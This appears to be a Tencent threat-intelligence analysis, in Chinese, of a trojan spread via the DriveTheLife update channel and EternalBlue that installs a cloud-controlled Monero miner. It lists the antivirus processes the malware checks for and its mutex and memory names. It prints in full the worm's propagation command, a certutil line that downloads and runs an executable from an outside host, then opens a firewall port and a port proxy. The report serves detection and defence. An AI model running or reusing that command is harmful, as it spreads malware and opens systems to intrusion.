腾讯安全御见威胁情报中心监测发现,一款通过“驱动人生”升级通道,并同时利用“永恒之蓝”高危漏洞传播的木马突然爆发,仅2个小时受攻击用户就高达10万。“驱动人生”木马会利用高危漏洞在企业内网呈蠕虫式传播,并进一步下载云控木马,在中毒电脑进行门罗币挖矿。
一、概述
12月14日下午,腾讯安全御见威胁情报中心监测发现,一款通过“驱动人生”升级通道,并同时利用“永恒之蓝”高危漏洞传播的木马突然爆发,仅2个小时受攻击用户就高达10万。
“驱动人生”木马会利用高危漏洞在企业内网呈蠕虫式传播,并进一步下载云控木马,在中毒电脑上进行门罗币挖矿。云控木马对企业信息安全威胁巨大,企业用户须重点关注。
该病毒爆发刚好是周末时间,令企业网管猝不及防,周一工作日员工电脑开机后,建议立刻查杀病毒,再使用杀毒软件的漏洞修复功能安装系统补丁。个人电脑用户使用腾讯电脑管家即可防御。
本次病毒爆发有三个特点:
1.驱动人生升级通道传播的病毒会在中毒电脑安装云控木马;
2.病毒会利用永恒之蓝漏洞在局域网内主动扩散;
3.通过云端控制收集中毒电脑部分信息,接受云端指令在中毒电脑进行门罗币挖矿。
通过检测以下进程将杀软信息搜集准备上传。
360tray.exe|360sd.exe|avp.exe|KvMonXP.exe|RavMonD.exe|Mcshield.exe|egui.exe|kxetray.exe|knsdtray.exe|TMBMSRV.exe|avcenter.exe|ashDisp.exe|rtvscan.exe|ksafe.exe|QQPCRTP.exe
打开互斥体,对象名称为”I am tHe xmr reporter” ,xmr意指xmrig.exe矿机。
母体设置进程共享内存HSKALWOEDJSLALQEOD
云控木马执行流程
云控木马运行后会创建一个线程,该线程函数主要功能是判断进程svhost.exe(母体进程)是否存在,不存在的话则启动该进程,接下来要读取的共享内存数据就是从该进程进行读取
读取共享内存数据
调用RtlDecompressBuffer函数解压共享内存中的数据,为下一步执行做准备
执行shellcode
2.3 攻击模块
攻击模块从地址hxxp://dl.haqo.net/eb.exez下载,作为子进程Svvhost.Exe启动,分析发现该文件是通过python实现的“永恒之蓝”漏洞利用模块压缩打包程序。
子进程Svvhost.Exe为将python实现的“永恒之蓝”漏洞利用模块压缩打包程序。
GitHub上也可以看到相关开源代码
不仅攻击内网漏洞机器,还随机找几个外网IP尝试攻击,1次攻击完后沉默20分钟
攻击成功后paylaod在中招机器执行以下命令进行内网扩散传播
cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53
安全建议
1. 服务器暂时关闭不必要的端口(如135、139、445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html
2. 企业用户在周一上班后,建议使用腾讯御点查杀病毒(个人用户可使用腾讯电脑管家),然后使用漏洞修复功能,修复全网终端存在的系统高危漏洞;
3. 服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;
4. 使用杀毒软件拦截可能的病毒攻击;
5. 推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。